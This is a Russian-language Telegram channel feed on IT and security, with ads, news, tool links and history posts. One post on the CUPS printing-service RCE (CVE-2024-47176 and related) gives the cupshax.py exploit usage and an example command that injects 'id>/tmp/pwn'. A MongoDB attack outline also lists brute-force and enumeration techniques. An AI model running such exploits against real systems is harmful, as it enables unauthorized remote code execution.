-
Обратная связь. Вопросы, предложения, пожелания, жалобы - @Social_Engineering_bot
Открытый практикум Linux by Rebrain: Репликация PostgreSQL
Для знакомства с нами после регистрации мы отправим вам запись практикума «DevOps by Rebrain». Вы сможете найти её в ответном письме!
👉Регистрация
Время проведения:
9 октября (среда) в 20:00 по МСК
Программа практикума:
🔹Разберем, чем хорош PostgreSQL
🔹Поговорим о том, что такое Vacuum и зачем он нужен
🔹Настроим физическую репликацию в PostgreSQL
Кто ведёт?
Андрей Буранов — системный администратор в департаменте VK Play. 10+ лет опыта работы с ОС Linux. 8+ лет опыта преподавания. Входит в топ-3 лучших преподавателей образовательных порталов.
Бесплатные практикумы по DevOps, Linux, Networks и Golang от REBRAIN каждую неделю. Подключайтесь!
Реклама. ООО "РЕБРЕИН". ИНН 7727409582 erid: 2Vtzqw9Xvd6
👨💻 Roadmap для тех, кто собирается в DevOps.
• Многие, кто изучают DevOps, ориентируются на Roadmap.sh. Это классный ресурс, который помогает понять, какие компетенции нужно приобрести в профессии. Но в нём очень много информации, начинающие специалисты рискуют утонуть в деталях.
• Более оптимальный роадмап можно найти на хабре. Он разбит на уровни, фокусирует внимание на том, что в первую очередь понадобится для старта и роста в профессии и содержит ссылки на наши платные и бесплатные курсы. Статья будет полезна разработчикам и системным администраторам, которые хотят перейти в DevOps.
➡️ https://habr.com/ru/post/773618
#DevOps #Roadmap
👨💻 Attacking MongoDB.
• MongoDB — это кроссплатформенная документо-ориентированная система управления базами данных. Относясь к категории NoSQL, MongoDB отказывается от традиционной таблично-ориентированной структуры реляционных баз данных в пользу JSON-документов с динамическими схемами, что делает интеграцию данных в приложениях более быстрой и простой.
• Поговорим о защищенности MongoDB. На самом деле MongoDB безопасна в использовании, если вы знаете, что искать и как это настраивать.
• Enumeration:
➡Nmap MongoDB Brute Force Attack;
➡Metasploit MongoDB Login Scanner;
➡Shodan Search for MongoDB Instances;
➡Manual MongoDB Interaction via PyMongo;
➡Common MongoDB Commands;
➡Automating MongoDB Enumeration with Nmap.
• Brute Force:
➡MongoDB Login Methods;
➡Checking for MongoDB Authentication Using Nmap;
➡Manual Brute Forcing;
➡Lack of Authentication in MongoDB Instance.
• Disable Unused Network Interfaces;
• Enable Access Control (Authentication);
• Enable SSL/TLS Encryption;
• Disable HTTP Interface;
• Enable Audit Logging:
➡Set Appropriate File Permissions;
➡Disable Unused MongoDB Features;
➡Enable Firewalls and Limit Access to MongoDB Ports.
• Exploiting Default Admin Users;
• Exploiting Misconfigured Role-Based Access Control (RBAC);
• Leveraging File System Access via MongoDB;
• Leveraging MongoDB API and Insecure Bindings;
• Misconfigured Backup Systems.
#MongoDB #devsecops
• Новости к этому часу: ирландская комиссия по защите данных (DPC) оштрафовала Meta на 102 млн. баксов! В ходе расследования DPC выяснили, что Meta хранила пароли на серверах компании в виде простого текста.
• Предполагается, что общее число паролей, которые хранились в незашифрованном виде, составляет около 600 млн., а вся эта история началась еще в 2012 году! К слову, к паролям могли иметь доступ около 20 000 сотрудников Meta...
➡️ Источник.
#Новости
👩💻 picosnitch. Утилита для мониторинга трафика в Linux.
• Смотрите, какая есть крутая тулза для мониторинга трафика в Linux. Покажет нам данные по определенному приложению, хешу, порту, домену и исполняемому файлу. Конфигурируется через json, а инфу выводит в веб-интерфейсе. А еще мы можем настроить различные уведомления, к примеру, когда наше ПО полезет в сеть. В общем и целом, по ссылке ниже (или на скриншоте) Вы сможете найти подробное описание и другую необходимую информацию:
➡️ https://github.com/elesiuta/picosnitch
#Linux
🐧 Cupshax - RCE через службу печати в UNIX
#unix #RCE #CVE
CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177
Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.
🛠 Изучить райтап ТУТ
Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.
➡️Использование
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]
A script for executing commands remotely
options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3
🌥 Зарождение облачных технологий. С чего все начиналось?
• Шестьдесят один год назад, в 1963 году, Управление перспективных исследовательских проектов (DARPA), действующее, как известно, в интересах Министерства обороны США, выделило Массачусетскому технологическому институту грант в размере двух миллионов долларов на очень интересную разработку. Она получила наименование Project on Mathematics and Computation, сокращенно — Project MAC, хотя к «макам» (в современном понимании), никакого отношения не имела.
• Целью исследователей, группу которых возглавили ученые-кибернетики Роберт М. Фано и Фернандо Хосе Корбато, стала разработка принципиально новой системы разделения времени, предназначенной для организации совместного доступа к ресурсам электронно-вычислительных машин нескольким удаленным пользователям. Причина интереса к подобным технологиям со стороны военного ведомства, в общем-то, очевидна: компьютеры в те времена были дорогими, и их насчитывалось относительно мало, а потребность в вычислениях росла стремительными темпами.
• В основу Project MAC легла созданная Фернандо Хосе Корбато за несколько лет до этого экспериментальная система Corbato Compatible Time-Sharing System (CTSS), которая позволяла пользователям нескольких подключенных к ЭВМ терминалов обращаться к одной и той же работающей на такой машине программе. Код CTSS переработали и усовершенствовали, в результате чего уже через полгода 200 пользователей в десяти различных лабораториях MIT смогли подключиться к одному компьютеру и централизованно запускать на нем программы. Это событие можно считать отправной точкой в истории развития облачных технологий, поскольку в рамках данного эксперимента был реализован основной лежащий в их основе принцип — многопользовательский режим доступа по требованию к общим вычислительным ресурсам.
• К 1969 году на основе проекта MAC компании Bell Laboratories и General Electric создали многопользовательскую операционную систему с разделением времени Multics (Multiplexed Information and Computing Service), в фундаменте которой лежали заложенные учеными MIT принципы. Помимо организации доступа к приложениям, Multics обеспечивала совместное использование файлов, а также реализовывала некоторые функции безопасности и защиты данных от случайного повреждения. Именно на основе этой системы в ноябре 1971 года Кен Томпсон создал первую версию UNIX, на долгие годы ставшую самой востребованной многопользовательской операционной системой в мире.
• Можно сказать, что с момента появления UNIX в истории развития облачных технологий на некоторое время наступило затишье, поскольку эта система полностью соответствовала требованиям как многочисленных коммерческих предприятий, так и учебных заведений, где она использовалась в образовательном процессе. Затишье продлилось ровно до тех пор, пока в самой Bell Laboratories не решили заменить UNIX более современной ОС, ориентированной в первую очередь на совместное использование аппаратных и программных ресурсов.
• Это решение стало еще одним шагом к развитию современных облачных технологий. Новая система Plan 9, разработкой которой занималась команда создателей UNIX во главе с Кеном Томпсоном, позволяла полноценно работать с файлами, файловыми системами и устройствами вне зависимости от того, на каком подключенном к сети компьютере они расположены физически. Де-факто, эта ОС превращала всю компьютерную сеть в одну глобальную многопользовательскую вычислительную систему с общими ресурсами, доступ к которым осуществлялся по требованию и в соответствии с правами пользователей — то есть, фактически, в некое подобие современного «облака».
• Следующим важным шагом в эволюции облачных систем стало появление виртуальных машин. Но об этом мы поговорим немного позже....
#Разное
Yandex Cloud запустила сервис для управления безопасностью в облаке Yandex Security Desk
Сервис позволит компаниям автоматизировать ключевые процессы информационной безопасности за счёт контроля прав доступа сотрудников, обеспечивая прозрачность данных и снижая риск утечек. Такой полный мониторинг для инфраструктуры в облаке ещё не был реализован в российских продуктах!
Yandex Security Desk объединяет несколько модулей по управлению безопасностью:
— Data Security Posture Management (DSPM) – для выявления персональных и других чувствительных данных в инфраструктуре;
— Cloud Infrastructure Entitlements Management (CIEM) – для проверки прав доступа к облачным ресурсам, что позволит обеспечить принцип минимальных привилегий;
— Access Transparency – для контроля прозрачности доступа сотрудников Yandex Cloud.
Подробнее читайте в блоге компании.
👩💻 Карманный Linux на базе Raspberry Pi Zero с клавиатурой BlackBerry.
• Разработчик и студент Дрезденского технического университета под ником ZitaoTech представил открытый проект Hackberry-Pi_Zero, включая 3D-модель корпуса и электрическую схему под лицензией MIT.
• Это карманный терминал #Linux на базе микрокомпьютера Raspberry Pi Zero 2W (чип Broadcom BCM2710A1 с четырьмя ядрами Cortex-A53 с рабочей частотой 1 ГГц, объём памяти 512 МБ ОЗУ LPDDR2 SDRAM) с 4" TFT-дисплеем разрешением 720х720 пикселей, оригинальной клавиатурой BlackBerry (Фото 1, модель Q10 или Q20) и питающийся от двух стандартных АКБ (фото 2) типа Nokia BL-5C.
• Следует отметить, что двойную сменную батарею можно поочерёдно заменить за 10 секунд, не отключая питание. Время работы батареи в режиме тестирования: 3,5 часа при использовании в качестве настольного компьютера, 5 часов в режиме работы в командной строке.
• Hackberry-Pi_Zero имеет 3 порта USB2.0, его можно использовать с USB-накопителем или модулем 4G Dongle или любым USB-устройством. Устройство имеет встроенный порт Stemma I2C, куда можно подключать любые датчики I2C. Гаджет имеет внешний слот для карты памяти типа TF.
• На Hackberry-Pi_Zero можно установить Kali Linux, Raspberrypi OS или Retropi и многие другие ОС на базе Linux. В готовом виде Hackberry-Pi_Zero можно приобрести (только без Nokia BL-5C) за $126 с клавиатурой BBQ10 или за $127 с клавиатурой BBQ20.
- Видеообзор устройства доступен на YT;
- Более подробное описание и вся необходимая информация есть на GitHub.
#Raspberry #Kali
• Если помните, то еще в Мае компания Llama Group планировала открыть код Winamp и перевести проект на модель для совместного развития, чтобы любой желающий мог принять участие в продолжении создания новых версий мультимедийного проигрывателя. Так вот, сегодня как раз этот день! 4 часа назад код был открыт и опубликован на github под свободной лицензией Winamp Collaborative License (WCL) Version 1.0.: https://github.com/WinampDesktop/winamp
• Напомню, что Winamp создан Джастином Франкелем и Дмитрием Болдыревым в 1997 году. Эта разработка является одним из самых долгоживущих мультимедийных проигрывателей, продолжающих активное развитие. Winamp изначально ориентирован на использование на платформе Windows и насчитывает около 83 млн пользователей.
#Разное #Новости
🔘 Resetting Hardware for Red Teamer.
• Cisco ASA 5500 Series Firewall;
• Siemens SIMATIC S7-1200 PLC;
• Palo Alto Networks PA-220 Firewall;
• Ubiquiti EdgeRouter X;
• Schneider Electric Modicon M221 PLC;
• Honeywell Experion PKS Controller;
• Hikvision DS-7600 NVR;
• APC Smart-UPS SMT1500RM2U;
• GE RX3i Controller;
• Cisco Catalyst 2960 Switch;
• Rockwell Automation Allen-Bradley CompactLogix PLC;
• Juniper EX2200 Switch;
• Siemens SIMATIC S7-1500 PLC;
• Dell PowerEdge R640 Server;
• Aruba Networks 2930F Switch;
• Axis M3106-LVE Network Camera;
• Fortinet FortiGate 30E Firewall;
• Yokogawa CENTUM VP DCS Controller;
• Panasonic KX-NS700 PBX;
• Mitsubishi Electric MELSEC-Q Series PLC.
#Red_Team #Hardware
📶 Nsntrace: захват трафика определенного приложения в Linux.
• Если перед нами стоит задача получить дамп трафика конкретного приложения в Linux, то мы можем воспользоваться утилитой Nsntrace. С помощью создания виртуальных интерфейсов и отдельного сетевого пространства имён, тулза запустит нужное нам приложение, и выполнит трассировку трафика только для него используя libpcap. Результат работы будет сохранен в отдельный файл, который можно будет прочитать любой стандартной утилитой, умеющей в pcap.
➡ https://github.com/nsntrace/nsntrace
#network #pcap
👩💻 Бесплатный практический курс по Bash.
• Набор встроенных команд bash (и его аналогов sh, zsh, etc) совместим с любым POSIX-совместимым приложением в #Linux, что позволяет встроить в ваш bash-скрипт любое совместимое приложение. Это дает очень большой набор возможностей в сфере автоматизации рутинных задач администрирования систем Linux, деплоя и сборки приложений, различных пакетных обработок, в том числе аудио и видео.
• Суть bash-скриптов — записать все ваши действия в один файл и выполнять их по необходимости. Благодаря этому курсу Вы освоите написание bash-скриптов с нуля и получите представление, какую пользу можно из них извлечь:
• Start Learning Bash;
• Create and Run Your First Bash Shell Script;
• Understanding Variables in Bash Shell Scripting;
• Passing Arguments to Bash Scripts;
• Using Arrays in Bash;
• Using Arithmetic Operators in Bash Scripting;
• String Operations in Bash;
• Decision Making With If Else and Case Statements;
• Loops in Bash;
• Using Functions in Bash;
• Automation With Bash.
#bash #Курс
💿 42 года компакт-диску.
• Ровно 42 года назад на свет появилась технология, в буквальном смысле слова изменившая мир. Именно в этот день, 1 октября 1982 года, компании Sony и Phillips выпустили на японский рынок первый компакт-диск. В тот же день Sony анонсировала первую в мире модель проигрывателя для компакт-дисков, получившую наименование CDP-101.
• Удивительно, но технологию лазерной записи данных на оптический носитель трудно было назвать принципиально новой даже в 1982 году. Способ сохранения информации на светопропускающем носителе был изобретен Дэвидом Полом Греггом в 1958 году, а запатентован — в 1961-м. В своих исследованиях Грегг использовал принцип оптического чтения и записи данных «на просвет», который не отличался высокой точностью и эффективностью — значительно большей плотности хранения информации и более высокой скорости ее обработки можно было добиться только с использованием отраженного света. Именно такой метод и применила компания Philips в процессе создания своей технологии LaserDisc. В отличие от более позднего CD, LaserDisc использовал аналоговую запись и не поддерживал полностью цифровой формат хранения данных. Диски имели довольно большой диаметр — 30 сантиметров, и внешне походили на виниловые грампластинки.
• Первый LaserDisc, на котором был записан голливудский блокбастер «Челюсти», поступил в продажу 15 декабря 1978 в Атланте, США. Однако в Америке, да и во всем мире эта технология не снискала популярности, так и не вытеснив с рынка видеокассеты форматов VHS и Betamax — прежде всего потому, что у пользователей отсутствовала возможность записывать на оптический носитель видеофильмы и телепрограммы. Определенное признание этот формат получил лишь в Японии, Южной Корее и в Сингапуре, в основном, благодаря распространившимся там точкам проката дисков с видеофильмами. Однако проигрыватели для LaserDisc стоили слишком дорого, хотя производились они во многих странах, в том числе, и в Советском Союзе.
• По сравнению со своим предшественником, появившийся в 1982 году Compact Disc (CD) был действительно «компактным» — он имел привычный нам диаметр 120 мм, но при этом сохранил прежнюю плотность записи за счет того, что данные сохранялись на носителе в цифровом формате. Первоначально носитель использовался только для аудиозаписей, даже назывался соответственно — Digital Audio Compact Disc, но позже на CD научились записывать другие типы информации. На читаемой поверхности компакт-диска располагалась спиральная оптическая дорожка довольно большой плотности, позволявшая хранить до 75 минут аудио. На самом первом коммерческом компакт-диске был издан альбом группа ABBA «The Visitors».
• На момент появления технологии в 1982 году компакт-диск мог хранить гораздо больше данных, чем жесткий диск персонального компьютера, который в те времена имел объем 10 Мбайт. Это и предопределило судьбу формата, обеспечив ему популярность.
• Несмотря на преклонный возраст, компакт-диски и их наследники — DVD и Blu-ray активно используются до сих пор, в основном, для хранения и архивации данных. Возможно, еще через несколько лет мы отметим круглую дату этой технологии.
#Разное
🐇 Plan 9.
• В 80-х годах XX века компания Bell Labs внезапно решила, что Unix устарел. Эта операционная система, разработанная Кеном Томпсоном и Деннисом Ритчи в недрах Bell ещё в начале 70-х, прекрасно зарекомендовала себя в качестве платформы для обслуживания телефонии, учёта абонентов и автоматизации различных технологических процессов. Но в Bell Labs пришли к выводу, что нужно двигаться дальше — и главного разработчика Unix привлекли к созданию ОС нового поколения, получившей название Plan 9.
• Проектом занялось специализированное подразделение Bell, известное как «Исследовательский центр компьютерных наук» (CSRC), а фактически разработку вела та же команда, которая изначально трудилась над Unix и языком программирования С — Кен Томпсон, Ден Ритчи, Роб Пайк, Дэйв Пресотто и Фил Уинтерботт.
• Plan 9 изначально задумывался как опытная модель для решения различных проблем операционных систем, нежели как реальный коммерческий продукт. Правда, это не помешало владельцам проекта продавать лицензии на систему. Однако не очень успешно и весьма дорого. В течение жизненного цикла ОС было выпущено 4 версии. Первая была доступна только университетам. Вторая продавалась за немалые $350 всем желающим. Третья распространялась бесплатно под лицензией Plan 9 License, а четвертая — под Lucent Public License v1.02. В 2014 году Plan 9 опубликовали под GPLv2.
• С некоторыми допущениями можно сказать, что Plan 9 — прямой потомок Unix: вне графической оболочки система управляется Unix-командами, а в основе новой операционной системы лежал применяемый в Unix принцип «всё есть файл», но здесь он был расширен до идеи «всё есть файл на любом устройстве» — ОС изначально была рассчитана на работу в сети по специальному файловому протоколу 9P. Это общий, независимый от среды протокол, обеспечивающий доставку сообщений в клиент-серверной архитектуре. В Plan 9 у каждого процесса имеется собственное изменяемое пространство имён, которое он может модифицировать, не затрагивая пространства имён связанных процессов. Среди таких модификаций предусмотрена возможность монтировать по протоколу 9Р соединения с серверами, что позволяет локальной ОС гибко использовать различные удалённые ресурсы — как отдельные файлы, так и устройства.
• В общем и целом, эксперимент остался экспериментом, а Plan 9 вдохновил на создание нескольких “потомков”: HarveyOS, Jehanne OS и Inferno OS. Что касается кода системы, то он достаточно компактен и легок. В теории Plan 9 можно портировать практически на любую процессорную архитектуру с аппаратной поддержкой MMU.
• Весьма курьезно происхождение имени ОС: она названа в честь второсортного ужастика 1959 года Plan 9 From Outer Space (в чем-то мысли разработчиков операционных систем сходятся). Посмотреть на работу системы в виртуальной машине можно тут: https://www.youtube.com/watch?v=8Px491QOd1Y
➡️ https://9p.io/plan9/
#Разное
❓ Как обнаружить SQL-уязвимость?
Освойте методы атаки и защиты на курсе SQL Injection Master! Аналогов по объему практики в СНГ и EN-cегменте нет.
🗣️ На курсе подробно разберём эксплуатацию SQL-инъекций, одну из наиболее опасных и эксплуатируемых видов атак на веб-приложения.
🎮 Немного оффтопа или пост выходного дня.
• Олды вспомнят и прослезятся: по ссылке ниже можно поиграть в первую Diablo и даже загрузить свое сохранение для продолжения игры с определенного момента.
➡️ https://d07riv.github.io/diabloweb/
#оффтоп
• Пришло время провести очередной розыгрыш. На этот раз мы разыграем целую коллекцию актуальных и нужных книг для ИБ специалистов. Всего будет 3 призовых места. Каждый победитель получит весь пул книг в бумажном варианте, которые перечислены ниже:
- Сети глазами хакера;
- Контролируемый взлом. Библия социальной инженерии;
- Хакерство. Секреты мастерства;
- Тестирование на проникновение с Kali Linux;
- Хакерство. Физические атаки с использованием хакерских устройств;
• По нашей традиции конкурс не предусматривает каких-либо условий. Просто нажимаете на кнопку под этим постом и Вы в деле. Доставку организую за свой счет. Итоги подведем в четверг (03.10 в 19:00), при помощи бота, который рандомно выберет победителя. Всем удачи и хороших выходных ❤️
P.S. Не забывайте ставить огонек под этим постом. Поговаривают, что шанс на победу может увеличится ))) 🔥
#Конкурс
🌐 Tor Project и Tails решили объединить усилия.
• 26 сентября 2024 года команды разработчиков открытых проектов Tor Project и Tails сообщили об объединении, чтобы дать своим пользователям инструменты обеспечения безопасности и противодействия цензуре. Также будут развиваться образовательные программы, чтобы больше пользователей знали, как задействовать различные сетевые технологии. В итоге Tails станет ещё популярнее среди пользователей Tor.
• Сотрудничество Tor Project и Tails преследует несколько ключевых целей:
➡укрепление защиты от слежки и цензуры в интернете;
➡упрощение сотрудничества между проектами и снижение затрат;
➡улучшение образовательных программ для пользователей;
➡расширение возможностей для активистов, журналистов и всех, кто нуждается в безопасности в интернете;
➡интеграция ресурсов и повышение узнаваемости Tails через платформу Tor.
• Руководить объединённой командой будут директора обоих проектов — это Изабель Рафальски из Tor Project и Рут Стейнбергер из Tails. Оба лидера будут совместно управлять проектами, чтобы направить усилия на дальнейшее развитие и интеграцию их технологий, обеспечивающих анонимность и безопасность пользователей в интернете.
#Новости #Tor #Tails
Открытый практикум Linux by Rebrain: Стандартные задачи для MySQL
Для знакомства с нами после регистрации мы отправим вам запись практикума «DevOps by Rebrain». Вы сможете найти её в ответном письме!
👉Регистрация
Время проведения:
2 октября (среда) в 20:00 по МСК
Программа практикума:
🔹Рассмотрим подходы к созданию бэкапов
🔹Узнаем, как сделать реплику мастером
🔹Настроим master-slave-slave репликацию и обсудим, что нужно учесть
Кто ведёт?
Андрей Буранов — системный администратор в департаменте VK Play. 10+ лет опыта работы с ОС Linux. 8+ лет опыта преподавания. Входит в топ-3 лучших преподавателей образовательных порталов.
Бесплатные практикумы по DevOps, Linux, Networks и Golang от REBRAIN каждую неделю. Подключайтесь!
Реклама. ООО "РЕБРЕИН". ИНН 7727409582 erid: 2VtzqvS4wkM
👨💻 HTTP Security Headers.
• X-Content-Type-Options Header;
• Reflected File Download (RFD);
• CORS Deception;
• Clickjacking;
• XSS (Cross-Site Scripting);
• SSL/TLS Stripping (MITM);
• Cookie Hijacking;
• CSRF (Cross-Site Request Forgery);
• Information Disclosure Attacks;
• Cache-Control Header;
• Content-Disposition Header;
• Cross-Origin Resource Policy (CORP);
• Extra HTTP Header Injection;
• Content-Encoding Header;
• Access-Control-Allow-Origin Header;
• X-Rate-Limit and X-Forwarded Headers;
• X-Content-Type-Options Header;
• XSS and CSRF Protection;
• Content-Security-Policy (CSP).
#devsecops
• Прошло чуть больше двух недель с момента проведения крайнего розыгрыша книг в этом канале. К сожалению, никакой новой литературы за это время не появилось, поэтому я решил собрать некоторые актуальные книги по ИБ в единый пул и разыграть эту коллекцию в группе. Список призов будет примерно таким:
- Сети глазами хакера;
- Контролируемый взлом. Библия социальной инженерии;
- Хакерство. Секреты мастерства;
- Тестирование на проникновение с Kali Linux;
- Хакерство. Физические атаки с использованием хакерских устройств;
• Каждый победитель, а их будет 3-5, получит сразу все книги, которые перечислены выше. Вероятно, что сюда добавятся еще кое-какая литература (но это не точно)... Конкурс проведем в эти выходные, поэтому не пропускайте и становитесь участниками.
• К посту подгрузил пару фоточек книг, которые выиграли прошлые участники.
#Конкурс
Открыта регистрация на главный онлайн-кэмп по практической кибербезопасности — CyberCamp 2024! 💙
Главная тема этого года — 🔥Cyber Kill Chain!🔥
Тебе предстоит изучить все аспекты киллчейна, научиться разрывать «убийственную цепочку» 🔗 и останавливать хакеров.
⭐️ 25 докладов от экспертов из компаний BI.ZONЕ, F.A.C.C.T., Positive Technologies, R-Vision, Инфосистемы Джет, Лаборатория Касперского, Код Безопасности и др.
⭐️ 600 участников и 15+ сценариев командных киберучений в корпоративной и студенческой лигах
⭐️ 10 000+ зрителей и 30+ интерактивных заданий для всех участников эфира
⭐️ 5 000 000 рублей общего призового фонда для команд и зрителей
Начни свой путь на CyberCamp 2024 прямо сейчас — первые задания и сайбы доступны сразу после регистрации ⚡️
👨💻 DevOops 2023.
• На YT появились доклады с DevOops 2023 - конференции по инженерным решениям и DevOps-культуре. Список докладов следующий:
• Security:
- GitOps с точки зрения безопасности;
- Как мы захотели автоматизировать Vault CE и во что его в итоге превратили;
- Безопасность контейнеров в 2023 году. Тренд или необходимость? (VK / VK Cloud);
- Токсичные репозитории. Что сейчас происходит с open source?
- Network Policy для разработчиков: как, зачем и почему;
- Прорастить или насадить? Руководство по выращиванию политик безопасной разработки;
- (Не)стандартный подход к моделированию Supply Chain Attack;
- Безопасность: консультативная vs запрещающая;
- Защищаем Kubernetes при помощи StackRox — дешево, сердито, эффективно?
- Security для бедных без ущерба для DevEx.
• K8s:
- Очумелые ручки: делаем свой Helm Chart Repository из подручных средств;
- Скрывая Kubernetes: подходы к конфигурированию;
- Stateful в K8s, которого мы боимся;
- Использование Helm без написания Helm-чартов;
- Сказка о рулевом и прорехах в пиджаке: как защитить K8s;
- Через тернии к Kubernetes operators;
- Побег из курятника контейнера;
- 7 раз отмерь, а потом переделай: как мы храним сетевые политики;
- Развертывание инфраструктуры в облаках с NOVA Container Platform.
#DevOps #Kubernetes
«Всем спасибо, было весело». Ком в горле при виде этого сообщения: основатель Флибусты Стивер объявил о закрытии проекта и одновременно своём смертельном диагнозе. В комментариях на форуме — шок и бесконечная благодарность за проект.
Флибуста — знаковый и важный проект для Рунета. 15 лет благодаря Флибусте я, вы и миллионы других людей могли найти книгу, которой часто нет даже на легальных ресурсах.
Буду рад сделать большой донат на оплату серверов, если кто-то из Флибусты выйдет на связь.
Шокировала лично новость, обязательно проверяйте своё здоровье, друзья, и берегите себя❤️
🔌 Microsoft будет использовать энергию АЭС для питания своего ЦОД.
• В Июне рассказывал Вам об интересном проекте "Natick" от Microsoft, суть которого заключалась в реализации подводного ЦОДа. Смысл проекта был в экономии на охлаждении и аренде земли (дата-центры потребляют значительное количество электричества — порядка 3,5% мирового энергопотребления. Примерно 15-20% энергии уходит на охлаждение оборудования).
• Так вот, недавно Microsoft заключила договор с компанией Constellation Energy, которая владеет закрытой атомной электростанцией Three Mile Island в Пенсильвании. В рамках соглашения майки будут использовать энергию одного из расконсервированных реакторов для питания дата-центра, который обслуживают ИИ-проекты.
• Реактор должен заработать в 2028 году. Его переименуют в Crane Clean Energy Center. Мощность реактора (837 МВт) будет эксклюзивно направляться Microsoft в течение 20 лет.
• Constellation направит на восстановление реактора $1,6 млрд, когда получит разрешение на расконсервацию у Комиссии по ядерной регламентации США, правительства штата и местных регуляторов, а также лицензию на управление АЭС до 2054 года.
• Также Microsoft планирует использовать для своих дата-центров энергию небольших ядерных реакторов. Пока в мире насчитывается три малых модульных ядерных реактора: в России и в Китае, а третий в стадии экспериментальной эксплуатации находится в Японии. Вот такие дела...
#Новости #Разное
❓ Как обнаружить SQL-уязвимость?
Освойте методы атаки и защиты на курсе SQL Injection Master! Аналогов по объему практики в СНГ и EN-cегменте нет.
🗣️ На курсе подробно разберём эксплуатацию SQL-инъекций, одну из наиболее опасных и эксплуатируемых видов атак на веб-приложения.
👨💻 История хакера, взломавшего Пентагон и NASA в 15 лет.
• Пост выходного дня: история жизни хакера, Джонатана Джонса, которому удалось проникнуть на серверы НАСА, взломать Пентагон, похитить программное обеспечение, управляющее МКС, и установить бекдор на серверах одного из американских военных ведомств. И все это в 15 летнем возрасте... Приятного чтения:
➡️ Читать статью [10 min].
#Разное